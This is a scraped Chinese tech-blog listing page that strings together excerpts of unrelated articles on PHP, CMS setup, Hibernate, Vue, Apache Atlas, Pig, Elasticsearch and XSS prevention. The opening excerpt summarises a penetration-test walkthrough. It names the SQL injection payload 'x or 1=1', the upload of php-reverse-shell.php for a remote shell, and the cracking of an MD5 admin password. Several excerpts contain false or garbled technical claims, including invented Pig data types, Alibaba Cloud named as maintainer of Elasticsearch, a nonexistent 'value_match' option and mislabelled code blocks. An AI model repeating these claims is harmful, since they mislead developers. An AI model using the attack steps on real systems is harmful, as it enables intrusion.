...段中插入恶意的SQL代码来欺骗服务器执行非授权操作。在文章的上下文中,攻击者发现靶机上的web应用存在SQL注入漏洞,并通过构造特定的SQL查询语句(如\ x or 1=1\ )成功获取了所有用户信息,说明该应用没有对用户输入进行充分的过滤和转义处理,导致攻击者可以操纵数据库查询并获取敏感数据。 php-reverse-shell.php , php-reverse-shell.php是一个预编译的PHP脚本,用于建立一个从目标服务器回连到攻击者控制主机的反向Shell通道。在渗透测试场景中,当攻击者发现web应用存在文件上传漏洞时,会利用这个脚本将它上传到靶机,并修改其中的IP地址和端口号以指向攻击者的监听位置。一旦受害者触发或访问被上传的恶意PHP文件,攻击者就能获得一个命令行交互界面,从而实现对靶机的远程控制。 MD5解密 , MD5(Message-Digest Algorithm 5)是一种广泛使用的密码散列函数,它可以产生一个固定长度、唯一代表原始输入信息的128位散列值。在本文中,超级管理员的密码经过MD5加密存储在数据库中。为了破解密码,攻击者需要使用在线MD5解密工具或字典库尝试匹配原始明文。在实战中,攻击者成功解密出MD5哈希值对应的密码为\ Uncrackable\ ,这表明该系统在密码保护方面可能存在不足,即未采取更安全的加盐哈希或其他复杂加密方式。
2023-01-02 12:50:54
497
转载
PHP
...新的宝塔面板,却发现PHP服务无法启动?别担心,这并不罕见,我们都知道,PHP作为Web开发的基石,它的稳定运行对我们的项目至关重要。接下来,咱们一块儿踏上解谜之旅,我会一步步揭示问题背后的玄机,手把手教你如何让PHP环境满血复活,就像给老朋友做一次舒爽的大扫除! 二、现象分析 1.1 现象描述 当你打开宝塔面板,点击“PHP版本”或者“PHP-FPM”管理,可能会看到一个红色的感叹号或者错误提示,告诉你PHP无法启动。这可能表现为“无法连接到服务器”、“缺少文件”或“配置错误”。 1.2 错误日志线索 查看PHP的日志文件(通常在/var/log/php-fpm.log或/var/log/php_error.log)是定位问题的第一步。有时候你会遇到一些小麻烦,比如找不到那个神秘的php.ini小伙伴,或者有些扩展好像还没跟上节奏,没好好加载起来。这些都是常见的小插曲,别担心,咱们一步步解决。 三、排查步骤 2.1 检查环境配置 确保PHP的安装路径正确,/usr/local/php或者/usr/bin/php,并且PHP-FPM服务已经正确安装并启用。可以运行以下命令检查: bash which php 如果返回路径正确,再运行: bash sudo service php-fpm status 确认服务状态。 2.2 检查php.ini 确认php.ini文件存在且权限正确,可以尝试编辑它,看看是否有禁止运行的设置: bash nano /usr/local/php/etc/php.ini 确保extension_dir指向正确的扩展目录,并且没有禁用必需的扩展,如mysqli或gd。 2.3 检查扩展 有些情况下,扩展可能没有正确安装或加载。打个比方,假如你需要PDO_MYSQL这个东东,记得在你的PHP配置文件里,Windows系统下应该是"extension=php_pdo_mysql.dll",Linux系统上则是"extension=pdo_mysql.so",别忘了加! 四、实例演示 假设你遇到了extension_dir未定义的问题,可以在php.ini中添加如下行: ini extension_dir = "/usr/local/php/lib/php/extensions/no-debug-non-zts-20200930" 然后重启PHP-FPM服务: bash sudo service php-fpm restart 五、高级排查与解决方案 3.1 检查防火墙 如果防火墙阻止了PHP-FPM的访问,需要开放相关端口,通常是9000。 3.2 安全组设置 如果你在云环境中,记得检查安全组规则,确保允许来自外部的请求访问PHP-FPM。 六、结语 通过以上步骤,你应该能解决大部分PHP在宝塔面板无法启动的问题。当然,每个环境都有其独特性,可能需要针对具体情况进行调整。遇到复杂问题时,不妨寻求社区的帮助,或者查阅官方文档,相信你一定能找到答案。记住,解决问题的过程也是一种学习,祝你在PHP的世界里越走越远!
2024-05-01 11:21:33
564
幽谷听泉_
转载文章
...e/Nginx + PHP4/PHP5.2+/PHP5.3+ + MySQL4/5 如果在windows环境中使用,建议用DedeCMS提供的DedeAMPZ套件以达到最佳使用性能。 2.Linux/Unix 平台 Apache + PHP4/PHP5 + MySQL3/4/5 (PHP必须在非安全模式下运行) 建议使用平台:Linux + Apache2.2 + PHP5.2/PHP5.3 + MySQL5.0 3.PHP必须环境或启用的系统函数: allow_url_fopen GD扩展库 MySQL扩展库 系统函数 —— phpinfo、dir 4.基本目录结构 / ..../install 安装程序目录,安装完后可删除[安装时必须有可写入权限] ..../dede 默认后台管理目录(可任意改名) ..../include 类库文件目录 ..../plus 附助程序目录 ..../member 会员目录 ..../images 系统默认模板图片存放目录 ..../uploads 默认上传目录[必须可写入] ..../a 默认HTML文件存放目录[必须可写入] ..../templets 系统默认内核模板目录 ..../data 系统缓存或其它可写入数据存放目录[必须可写入] ..../special 专题目录[生成一次专题后可以删除special/index.php,必须可写入] 5.PHP环境容易碰到的不兼容性问题 (1)data目录没写入权限,导致系统session无法使用,这将导致无法登录管理后台(直接表现为验证码不能正常显示); (2)php的上传的临时文件夹没设置好或没写入权限,这会导致文件上传的功能无法使用; (3)出现莫名的错误,如安装时显示空白,这样能是由于系统没装载mysql扩展导致的,对于初级用户,可以下载dede的php套件包,以方便简单的使用。 二、程序安装使用 1.下载程序解压到本地目录; 2.上传程序目录中的/uploads到网站根目录 3.运行http://www.yourname.com/install/index.php(yourname表示你的域名),按照安装提速说明进行程序安装 本篇文章为转载内容。原文链接:https://blog.csdn.net/weixin_31879641/article/details/115616068。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-09-24 09:08:23
278
转载
转载文章
...显示。有三种用法, 代码如下: 复制代码 代码如下: {capture name="banner"}aaaaaa{/capture} {$smarty.capture.banner} {capture assign="foo"}bbbbbb{/capture} {$foo} {capture append="arr"}hello{/capture} {capture append="arr"}world{/capture} {foreach $arr as $value} {$value} {/foreach} 第一种:{capture}使用name属性; 第二种:{capture}捕获内容到变量; 第三种:{capture}捕获内容到数组变量。 转载自 http://www.php.cn/php-notebook-167408.html 补充,看了下手册,name是必须的属性,上面的写法估计不严谨,简单记录一下吧。 本篇文章为转载内容。原文链接:https://blog.csdn.net/fjnjxr/article/details/95172043。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-12-03 17:52:39
79
转载
转载文章
...om/plugin.php?id=auction 3.新浪官博之【创业者大会送票】活动 http://e.weibo.com/2975543812/zqr1yeSCe 4.安卓巴士项目小组 http://www.apkbus.com/group.php?gid=3 二、视频教程汇总 1.老罗Android开发视频教程 http://www.apkbus.com/Android-246-1.html 2. mars安卓开发视频教程 http://www.apkbus.com/Android-248-1.html 3.ios开发视频教程 http://iphone.apkbus.com/ 三、论坛经典内容汇总 1.美女象棋源码 http://www.apkbus.com/android-106605-1-1.html 2.Adnroid 安全卫士源码 http://www.apkbus.com/android-83653-1-1.html 3.百度地图SDK for Android 2.1版下载 http://www.apkbus.com/android-105237-1-1.html 4.eclipse不自定弹出提示(alt+/快捷键失效) http://www.apkbus.com/android-104663-1-1.html 5.Android即时通信系统的实现 http://www.apkbus.com/android-104564-1-1.html 6.Android编程14个很有用的代码片段 http://www.apkbus.com/android-104070-1-1.html 7.音乐播放器频谱绘制 http://www.apkbus.com/android-98147-1-1.html 8.Android开发手册(离线版)与(在线版)谭东编写 http://www.apkbus.com/android-97714-1-1.html 9.Sqlite+listview 的实例 http://www.apkbus.com/android-96910-1-1.html 10.iReader,QQ阅读书架效果的实现(附源码) http://www.apkbus.com/android-99130-1-1.html 11.Android 对话框(Dialog)大全 http://www.apkbus.com/android-98097-1-1.html 12.九宫格密码解锁(修正版) http://www.apkbus.com/android-97699-1-1.html 13.Android Chart图开源库AChartEngine教程 http://www.apkbus.com/android-94575-1-1.html 14.基于Socket的Android手机视频实时传输 http://www.apkbus.com/android-91517-1-1.html 15. 喷泉粒子系统源码 http://www.apkbus.com/android-106463-1-1.html 本篇文章为转载内容。原文链接:https://blog.csdn.net/m_3251388/article/details/8888970。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-04-15 17:53:42
321
转载
JQuery
...; 然后,在HTML代码中创建一个搜索框,以及一个DIV框用于显示自动补全的信息: <div> <input type="text" id="search"> <div id="result"></div> </div> 这里,id为“search”的输入框用来获取用户输入的关键词,id为“result”的DIV用于显示自动补全的信息。 然后,就是使用Jquery实现自动补全的特性。代码如下: $(document).ready(function(){ $("search").keyup(function(){ var keyword = $("search").val(); if(keyword != ''){ //调用后台接口,获取自动补全信息 $( "result" ).load( "suggest.php?keyword="+keyword ); } }); }); 这段代码中,使用了Jquery的按键释放事件(keyup),当用户在输入框中输入或删除字符时,就会触发这个事件。然后,获取输入框中的关键词(即输入框的值),判断是否为空。如果不为空,就调用后台接口,将关键词作为参数传递给后台PHP文件suggest.php进行处理,然后将结果显示在id为“result”的DIV中。 到这里,Jquery搜索框自动补全特性就实现了。这里只是一个简单的示例,实际开发中还需要对搜索结果进行样式美化、后台代码进行优化等一系列工作。
2023-07-13 13:42:25
286
程序媛
转载文章
在深入理解PHP与MySQL实现数据分页查询的基础上,延伸阅读可以关注以下几个方面的内容: 1. PHP最新数据库扩展:随着PHP版本的不断更新迭代,原本的mysql_系列函数已被弃用,推荐使用mysqli或PDO_MySQL扩展进行数据库操作。例如,通过学习如何利用mysqli执行预处理语句并结合LIMIT子句实现安全高效的分页查询,既能提升代码性能,又能有效防止SQL注入攻击。 2. MySQL 8.0的新特性优化分页查询:MySQL 8.0引入了窗口函数和OFFSET-FETCH等新特性,可大幅优化大数据量下的分页查询效率。比如,通过LEAD、LAG窗口函数获取前后行数据,或者直接使用OFFSET FETCH方式替代传统的LIMIT子句加计数查询的方式,以减少服务器压力。 3. 前端技术与分页组件集成:在实际项目中,前端页面与后端数据分页功能的结合至关重要。诸如Vue.js、React等现代前端框架中的成熟分页组件,如Element UI Pagination、Ant Design Pagination等,能够很好地配合后端接口实现动态加载分页数据,提升用户体验。 4. 分页策略在大数据环境下的演进:在处理海量数据时,传统的一次性拉取所有分页信息的方法往往效率低下。此时,可以探讨采用无限滚动(Infinite Scroll)、懒加载(Lazy Load)等现代Web应用中常见的分页策略,并结合API的分页优化设计,实现更流畅的数据浏览体验。 5. 云数据库服务对分页查询的支持:随着云计算的发展,阿里云RDS、AWS Aurora等云数据库服务提供了丰富的分页查询优化方案。了解这些服务如何通过索引优化、读写分离、分布式存储等手段提高分页查询性能,对于构建高可用、高性能的应用系统具有指导意义。 综上所述,PHP与MySQL实现数据分页查询只是整个应用架构中的一部分,结合最新的数据库技术和前端框架,以及适应大数据环境的分页策略,将有助于开发者不断提升系统的稳定性和用户体验。
2023-01-28 21:41:26
109
转载
Apache Pig
...元组。例如: php-template j = (1, 'apple'); (11)映射数组型:map Pig中的映射数组型是一个包含多个键值对的列表。例如: bash k = {'key1': 'value1', 'key2': 'value2'}; 2. 复杂类型 Pig中的复杂数据类型主要有两种:列表和文件。 (1)列表:list Pig中的列表是一个包含多个相同类型元素的列表。例如: php-template l = [1, 2, 3]; (2)文件:file Pig中的文件是一个包含多个行的数据文件。例如: makefile m = '/path/to/file.txt'; 3. 特殊类型 Pig中的特殊数据类型主要有三种:null、undefined和struct。 (1)null:null Pig中的null表示一个空值。例如: java n = null; (2)undefined:undefined Pig中的undefined表示一个未定义的值。例如: python o = undefined;
2023-01-14 19:17:59
480
诗和远方-t
转载文章
...FTP等众多协议。在PHP编程中,cURL扩展常被用来发起HTTP请求,获取远程服务器上的资源内容。本文中,curlGet函数就是利用PHP的cURL功能来获取指定URL页面的源代码,进而从中提取所需的JSON数据。 JSON解码 , JSON解码是指将JSON格式的字符串转换成PHP中的关联数组或对象的过程,以便程序能够处理和操作这些数据。在文章提供的PHP代码片段中,json_decode()函数被用来对从网页源码中提取到的JSON数据进行解码,将其转化为PHP数组结构,这样就可以直接通过数组索引或者属性名访问其中的各项信息了。例如,通过$jsonArr detail playurl 即可获取到mp3的下载地址。
2023-03-14 14:04:46
227
转载
Hibernate
...nate是一个开放源代码的对象关系映射框架,它允许我们把数据库操作抽象成对象间的交互,使得我们可以更加方便地处理数据。在实际操作Hibernate的时候,咱们免不了会碰上各种意想不到的小插曲,就比如说,其中一种常见的状况就是“org.hibernate.MappingException: Unknown entity”这个问题,它就像个淘气的小怪兽,时不时跳出来和我们捉迷藏。这篇文章将会详细介绍这个问题以及解决办法。 二、问题描述 当我们在使用Hibernate进行操作时,如果出现了“org.hibernate.MappingException: Unknown entity”的错误提示,那么就表示我们的程序无法识别某个实体类。这通常是由于以下几种情况导致的: 1. 我们在配置文件中没有正确地添加我们需要映射的实体类。 2. 我们的实体类定义存在错误,例如缺少必要的注解或者字段定义不正确等。 3. Hibernate的缓存没有正确地工作,导致其无法找到我们所需要的实体类。 三、解决方案 针对以上的情况,我们可以通过以下几种方式来解决问题: 1. 添加实体类到配置文件 首先,我们需要确保我们的实体类已经被正确地添加到了Hibernate的配置文件中。如果咱现在用的是XML配置文件这种方式,那就得在那个"class"标签里头,明确指定咱们的实体类。例如: php-template 如果我们使用的是Java配置文件,那么我们需要在@EntityScan注解中指定我们的实体类所在的包。例如: less @EntityScan("com.example") public class MyConfig { // ... } 2. 检查实体类定义 其次,我们需要检查我们的实体类定义是否存在错误。比如,咱们得保证咱们的实体类已经妥妥地标记上了@Entity这个小标签,而且,所有的属性都分配了正确的数据类型和相对应的注解,一个都不能少。此外,我们还需要确保我们的实体类实现了Serializable接口。 例如: java @Entity public class MyEntity implements Serializable { private Long id; private String name; // getters and setters } 3. 调整Hibernate缓存设置 最后,我们需要确保Hibernate的缓存已经正确地工作。如果我们的缓存没整对,Hibernate可能就抓不到我们想要的那个实体类了。我们可以通过调整Hibernate的缓存设置来解决这个问题。例如,我们可以禁用Hibernate的二级缓存,或者调整Hibernate的查询缓存策略。 例如: java Configuration cfg = new Configuration(); cfg.setProperty("hibernate.cache.use_second_level_cache", "false"); SessionFactory sessionFactory = cfg.buildSessionFactory(); 四、结论 总的来说,“org.hibernate.MappingException: Unknown entity”是一种常见的Hibernate错误,主要是由于我们的实体类定义存在问题或者是Hibernate的缓存设置不当导致的。根据以上提到的解决方法,咱们应该能顺顺利利地搞定这个问题,这样一来,咱就能更溜地用Hibernate来操作数据啦。同时,咱们也得留意到,Hibernate出错其实就像咱编程过程中的一个预警小喇叭,它在告诉我们:嗨,伙计们,你们的设计或者代码可能有需要打磨的地方啦!这正是我们深入检查代码、优化系统设计的好时机,这样一来,咱们的编程质量和效率才能更上一层楼。
2023-10-12 18:35:41
463
红尘漫步-t
转载文章
...owproblem.php?pid=6203 给出q条链 由u和v确定 每条链上至少有一个节点是有故障的 问整个树图中至少有多少故障节点 对于每条链 求出lca 再按lca的深度降序排序 然后对于一条链 如果uv节点都没有被其他链覆盖过 那就将lca对应的整棵子树标记覆盖 答案加加 否则就说明当前这条链上的故障点已经可以和别的链合并了 可以忽略 至于为什么要按深度降序排序 我认为这样每次只需要判断一条链是不是已经通过其他链确定 如果升序排序 每一次要看lca到u和v这条链上有多少其它链上的lca被影响 很难写 (借鉴)同时 由于优先处理 LCA 深度大的点 不会出现点 U V 同时在同一个被禁止通行点 P 的子树内 include <cstdio>include <cmath>include <cstring>include <algorithm>using namespace std;struct node0{int u;int v;int lca;};struct node1{int v;int next;};node0 pre[50010];node1 edge[60010];int dp[30010][15];int val[120010];int first[30010],deep[30010],mp[30010],sum[30010];int n,q,num;bool cmp(node0 n1,node0 n2){return deep[n1.lca]>deep[n2.lca];}void addedge(int u,int v){edge[num].v=v;edge[num].next=first[u];first[u]=num++;}void dfs(int cur,int fa){int i,v;mp[cur]=++num,sum[cur]=1;for(i=first[cur];i!=-1;i=edge[i].next){v=edge[i].v;if(v!=fa){dp[v][0]=cur;deep[v]=deep[cur]+1;dfs(v,cur);sum[cur]+=sum[v];} }return;}void solve(){int i,j;dp[1][0]=0;deep[1]=1;num=0;dfs(1,0);for(j=1;(1<<j)<=n;j++){for(i=1;i<=n;i++){dp[i][j]=dp[dp[i][j-1]][j-1];} }return;}int getlca(int u,int v){int i;if(deep[u]<deep[v]) swap(u,v);for(i=log2(n);i>=0;i--){if(deep[dp[u][i]]>=deep[v]){u=dp[u][i];} }if(u==v) return u;for(i=log2(n);i>=0;i--){if(dp[u][i]!=dp[v][i]){u=dp[u][i];v=dp[v][i];} }return dp[u][0];}void query(int tar,int &res,int l,int r,int cur){int m;res|=val[cur];if(l==r) return;m=(l+r)/2;if(tar<=m) query(tar,res,l,m,2cur);else query(tar,res,m+1,r,2cur+1);}void update(int pl,int pr,int l,int r,int cur){int m;if(pl<=l&&r<=pr){val[cur]=1;return;}m=(l+r)/2;if(pl<=m) update(pl,pr,l,m,2cur);if(pr>m) update(pl,pr,m+1,r,2cur+1);}int main(){int i,u,v,resu,resv,ans;while(scanf("%d",&n)!=EOF){n++;memset(first,-1,sizeof(first));num=0;for(i=1;i<=n-1;i++){scanf("%d%d",&u,&v);u++,v++;addedge(u,v);addedge(v,u);}solve();scanf("%d",&q);for(i=1;i<=q;i++){scanf("%d%d",&pre[i].u,&pre[i].v);pre[i].u++,pre[i].v++;pre[i].lca=getlca(pre[i].u,pre[i].v);}sort(pre+1,pre+q+1,cmp);for(i=1;i<=4n;i++) val[i]=0;ans=0;for(i=1;i<=q;i++){resu=0,resv=0;query(mp[pre[i].u],resu,1,n,1);query(mp[pre[i].v],resv,1,n,1);if(!resu&&!resv){update(mp[pre[i].lca],mp[pre[i].lca]+sum[pre[i].lca]-1,1,n,1);ans++;} }printf("%d\n",ans);}return 0;} 本篇文章为转载内容。原文链接:https://blog.csdn.net/sunyutian1998/article/details/82155271。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2023-08-26 17:12:34
82
转载
VUE
...! 下面是一段简单的代码示例: css { { message } } 在这个例子中,我们创建了一个表单元素,并通过v-model指令绑定了message数据,当表单元素的值改变时,message的值也会相应地改变,从而实现了响应式设计。 二、动态路由 动态路由是指根据URL的变化,动态加载对应的页面内容。在使用Vue.js的时候,我们可以巧妙地借助路由守卫和动态参数这两样法宝,轻松实现这个功能。就像是武侠小说里那样,路由守卫就像是守护关卡的大侠,能帮我们在页面跳转的关键时刻进行拦截和判断;而动态参数嘛,就像是一把可以灵活变化的密钥,使得我们能够根据实际需要,传递并获取到实时变化的数据信息,从而更好地完成这个功能的操作。 下面是一个简单的代码示例: php-template { { item.name } } 在这个例子中,我们使用了动态参数来传递item对象的id属性,然后在动态路由页面中通过$route.params获取到这个id属性,从而动态加载对应的内容。 三、数据持久化 在很多情况下,我们需要保存用户的操作历史或者是登录状态等等。这时,我们就需要用到数据持久化功能。而在Vue.js中,我们可以利用localStorage来实现这个功能。 下面是一个简单的代码示例: javascript export default { created() { this.loadFromLocalStorage(); }, methods: { saveToLocalStorage(key, value) { localStorage.setItem(key, JSON.stringify(value)); }, loadFromLocalStorage() { const data = localStorage.getItem(this.key); if (data) { this.data = JSON.parse(data); } } } } 在这个例子中,我们在created钩子函数中调用了loadFromLocalStorage方法,从localStorage中读取数据并赋值给data。接着,在saveToLocalStorage这个小妙招里,我们把data这位小伙伴变了个魔术,给它变成JSON格式的字符串,然后轻轻松松地塞进了localStorage的大仓库里。 四、文件上传 在很多应用中,我们都需要让用户上传文件,例如图片、视频等等。而在Vue.js中,我们可以利用FileReader API来实现这个功能。 下面是一个简单的代码示例: php-template 在这个例子中,我们使用了multiple属性来允许用户一次选择多个文件。然后在handleFiles方法中,我们遍历选定的文件数组,并利用FileReader API将文件内容读取出来。 以上就是我分享的一些尚未开发的Vue.js项目,希望大家能够从中找到自己的兴趣点,并且勇敢地尝试去做。相信只要你足够努力,你就一定能成为一名优秀的Vue.js开发者!
2023-04-20 20:52:25
380
梦幻星空_t
Apache Atlas
...我都会配上鲜活的实例代码展示。这样一来,你们就能更直观、更接地气地理解和掌握Apache Atlas的使用诀窍啦! 二、单机部署模式 单机部署模式是最简单的部署方式,适合小规模的企业或团队使用。在单机部署模式下,所有组件都在同一台机器上运行。 1. 部署步骤 下载并解压Apache Atlas的安装包; 修改配置文件(如:conf/atlas-env.sh); 启动所有服务(如:bin/start-all.sh); 浏览器访问http://localhost:21000进行初始化设置。 以下是使用Apache Atlas创建一个项目的基本代码示例: javascript // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 三、集群部署模式 集群部署模式适合中大型企业或团队使用,可以提高系统的可用性和性能。 1. 部署步骤 在多台机器上安装并启动Apache Atlas的所有服务; 使用Zookeeper进行服务注册和发现; 使用Apache Atlas API进行项目管理和其他操作。 以下是使用Apache Atlas在集群中创建一个项目的代码示例: php-template // 获取Zookeeper集群的地址 GET http://localhost:2181/_clusterinfo // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 四、混合部署模式 混合部署模式结合了单机和集群的优势,既可以提供较高的性能,又可以保证数据的安全性和可靠性。 1. 部署步骤 在单台机器上安装并启动Apache Atlas的服务,作为中央控制节点; 在多台机器上安装并启动Apache Atlas的服务,作为数据处理节点; 使用Zookeeper进行服务注册和发现; 使用Apache Atlas API进行项目管理和其他操作。 以下是使用Apache Atlas在混合部署中创建一个项目的代码示例: javascript // 创建中央控制节点 GET http://localhost:21000/api/v2/projects // 获取Zookeeper集群的地址 GET http://localhost:2181/_clusterinfo // 创建数据处理节点 POST http://localhost:21000/api/v2/nodes { "hostName": "data-node-1", "port": 21001, "role": "DATA_NODE" } // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 五、微服务部署模式 微服务部署模式是近年来越来越流行的一种部署方式,可以让企业更加灵活地应对业务的变化和需求的增长。 1. 部署步骤 将Apache Atlas分解为多个微服务,例如:项目管理、数据目录、元数据存储等; 使用Docker进行容器化部署; 使用Kubernetes进行服务编排和管理; 使用Apache Atlas API进行项目管理和其他操作。 以下是使用Apache Atlas在微服务部署中创建一个项目的代码示例: javascript // 安装并启动项目管理微服务 docker run -d --name atlas-project-management my-atlas-project-management-image // 安装并启动数据目录微服务 docker run -d --name atlas-data-directory my-atlas-data-directory-image // 安装并启动元数据存储微服务 docker run -d --name atlas-metadata-storage my-atlas-metadata-storage-image // 创建项目 POST http://localhost:21000/api/v2/project { "name": "my_project", "description": "My first project with Apache Atlas" } 总结 Apache Atlas有多种部署模式供用户选择,用户可以根据自己的需求和技术条件来选择最合适的部署方式。甭管您选择哪种部署方式,Apache Atlas都能像个小助手一样,帮助企业老铁们把数据资产打理得井井有条,妥妥地保护好这些宝贝资源。
2023-07-31 15:33:19
455
月下独酌-t
转载文章
...t/problem.php?cid=1026&pid=2 题目描述 Jam是个喜欢标新立异的科学怪人。他不使用阿拉伯数字计数,而是使用小写英文字母计数,他觉得这样做,会使世界更加丰富多彩。 在他的计数法中,每个数字的位数都是相同的(使用相同个数的字母),英文字母按原先的顺序,排在前面的字母小于排在它后面的字母。我们把这样的“数字”称为Jam数字。在Jam数字中,每个字母互不相同,而且从左到右是严格递增的。每次,Jam还指定使用字母的范围,例如,从2到10,表示只能使用 b , c , d , e , f , g , h , i , j {b,c,d,e,f,g,h,i,j} b,c,d,e,f,g,h,i,j这些字母。如果再规定位数为5,那么,紧接在Jam数字“bdfijbdfij”之后的数字应该是“bdghibdghi”。(如果我们用U、V依次表示JamJam数字“bdfijbdfij”与“bdghibdghi”,则U<V,且不存在Jam数字P,使U<P<V)。 你的任务是:对于从文件读入的一个Jam数字,按顺序输出紧接在后面的5个Jam数字,如果后面没有那么多Jam数字,那么有几个就输出几个。 输入格式 共2行。 第1行为3个正整数,用一个空格隔开:s t w(其中s为所使用的最小的字母的序号,t为所使用的最大的字母的序号。w为数字的位数,这3个数满足: 1 ≤ s < T ≤ 26 , 2 ≤ w ≤ t − s 1≤s<T≤26, 2≤w≤t-s 1≤s<T≤26,2≤w≤t−s ) 第2行为具有w个小写字母的字符串,为一个符合要求的Jam数字。 所给的数据都是正确的,不必验证。 输出格式 最多为5行,为紧接在输入的Jam数字后面的5个Jam数字,如果后面没有那么多Jam数字,那么有几个就输出几个。每行只输出一个Jam数字,是由w个小写字母组成的字符串,不要有多余的空格。 输入输出样例 输入 2 10 5bdfij 输出 bdghibdghjbdgijbdhijbefgh 说明/提示 NOIP 2006 普及组 第三题 —————————————— 今天考试,当然不是14年前的普及组考试,是今天的东城区挑战赛,第三道题就是这道题,只不过改成了“唐三的计数法”,我没做过这道题,刚看到这道题还以为要用搜索,写了一个小时,直接想复杂了。后来才明白直接模拟即可! 从最后一位开始,尝试加一个字符,然后新加的字符以后的所有字符都要紧跟(就这一点,我用深搜写不出来,归根结底还是理解不够),才能使新增的字符串紧跟上一个字符串。 include <iostream>include <cstring>include <cstdio>using namespace std;int main(){int s, t, w;char str[30];cin >> s >> t >> w >> str;for (int i = 1; i <= 5; i++){for (int j = w - 1; j >= 0; j--){if (str[j] + 1 <= ('a' + (t - (w - j)))){// 确认当前有可用字母就可以大胆用了,j就是变动位str[j] += 1;// 当前位置后的位置都是对齐位for (int k = j + 1; k < w; k++)str[k] = str[j] + k - j;cout << str << endl;// 是每次找到一组合适的就跳出break;} }}return 0;}/一个方法做的时间超过半小时,或者思路减退、代码渐渐复杂、心态渐渐崩溃时,要及时切换思路。/ 本篇文章为转载内容。原文链接:https://blog.csdn.net/cool99781/article/details/116902217。 该文由互联网用户投稿提供,文中观点代表作者本人意见,并不代表本站的立场。 作为信息平台,本站仅提供文章转载服务,并不拥有其所有权,也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况,请及时联系我们,我们将第一时间进行核实并删除相应内容。
2024-02-12 12:42:53
562
转载
ElasticSearch
...,更会搬出实实在在的代码实例,让你亲眼看它们怎么实操上阵。 二、什么是Elasticsearch? Elasticsearch是一个开源的分布式搜索引擎。它最初由 Elasticsearch BV 开发,现在由阿里云进行维护和开发。Elasticsearch 是一个基于 Lucene 的搜索引擎,支持实时分析、跨索引搜索和地理空间搜索等功能。 三、高级搜索功能 1. Fuzzy 搜索 Fuzzy搜索是一种模糊匹配算法,可以在输入关键字时容忍一些拼写错误。这使得我们可以更轻松地找到与我们的查询相匹配的结果。 在Elasticsearch中,我们可以使用fuzziness选项启用Fuzzy搜索。下面是一个使用Fuzzy搜索的例子: php-template GET /my_index/_search { "query": { "multi_match": { "query": "some text", "fields": ["text"], "fuzziness": "auto" } } } 在这个例子中,我们正在搜索名为“my_index”的索引中的所有包含“some text”的文档。"Fuzziness"这个参数你要是设成“auto”,那就相当于告诉Elasticsearch:伙计,你看着办吧,根据查询字符串的长短自己挑个最合适的模糊匹配程度哈! 2. 近义词搜索 近义词搜索是指在一个查询中替换一个单词为其同义词的能力。这对于处理同义词丰富且变化多端的数据集非常有用。 在Elasticsearch中,我们可以使用synonyms选项启用近义词搜索。下面是一个使用近义词搜索的例子: json PUT /my_index/_settings { "analysis": { "analyzer": { "my_analyzer": { "tokenizer": "standard", "filter": [ { "type": "synonym", "synonyms_path": "/path/to/synonyms.txt" } ] } } } } POST /my_index/_doc { "text": "This is an example sentence." } 在这个例子中,我们首先创建了一个名为“my_analyzer”的分析器,该分析器使用标准分词器和一个加载了同义词的过滤器。然后,我们使用这个分析器来索引一条包含“example”单词的文档。当你在搜索时用上了“sample”这个同义词,Elasticsearch会超级给力地找出和你最初输入的那个查询一模一样的结果来。就像是有个贴心的小助手,无论你怎么变着花样描述,它都能准确理解你的意思,并且给你找出完全匹配的答案。 3. 值匹配搜索 值匹配搜索是指在查询中指定要匹配的具体值的能力。这对于处理类型明确的数据非常有用,例如日期、数字或地理位置等。 在Elasticsearch中,我们可以使用value_match选项启用值匹配搜索。下面是一个使用值匹配搜索的例子: json GET /my_index/_search { "query": { "bool": { "must": [ { "range": { "date_field": { "gte": "now-3d" } } }, { "match": { "string_field": "some text" } } ] } } } 在这个例子中,我们正在搜索名为“my_index”的索引中所有满足两个条件的文档:文档的“date字段”必须大于等于当前日期减去3天,并且文档的“string字段”必须包含“some text”。 四、总结 Elasticsearch不仅提供了基本的搜索功能,而且还提供了许多高级搜索功能。通过利用这些功能,我们可以更高效地搜索和管理我们的数据。 在未来的文章中,我们将继续探索更多的Elasticsearch功能,并提供更多的代码示例。感谢您的阅读,如果您有任何疑问或反馈,请随时告诉我。
2023-02-26 23:53:35
527
岁月如歌-t
Tomcat
...一下。例如: php-template if (username != "admin" || password != "password") { return false; } 最后,我们还需要定期更新Tomcat和其他软件的安全补丁,以及使用最新的安全技术和工具,以提高我们的防御能力。另外,咱们还可以用上一些防火墙和入侵检测系统,就像给咱的网络装上电子眼和防护盾一样,实时留意着流量动态,一旦发现有啥不对劲的行为,就能立马出手拦截,确保安全无虞。 当然,除了上述方法外,还有很多其他的方法可以防止跨站脚本攻击(XSS),比如使用验证码、限制用户提交的内容类型等等。这些都是值得我们深入研究和实践的技术。 总的来说,防止访问网站时出现的安全性问题,如跨站脚本攻击(XSS)或SQL注入,是一项非常重要的任务。作为开发小哥/小姐姐,咱们得时刻瞪大眼睛,绷紧神经,不断提升咱的安全防护意识和技术能力。这样一来,才能保证我们的网站能够安安稳稳、健健康康地运行,不给任何安全隐患留空子钻。只有这样,我们才能赢得用户的信任和支持,实现我们的业务目标。"
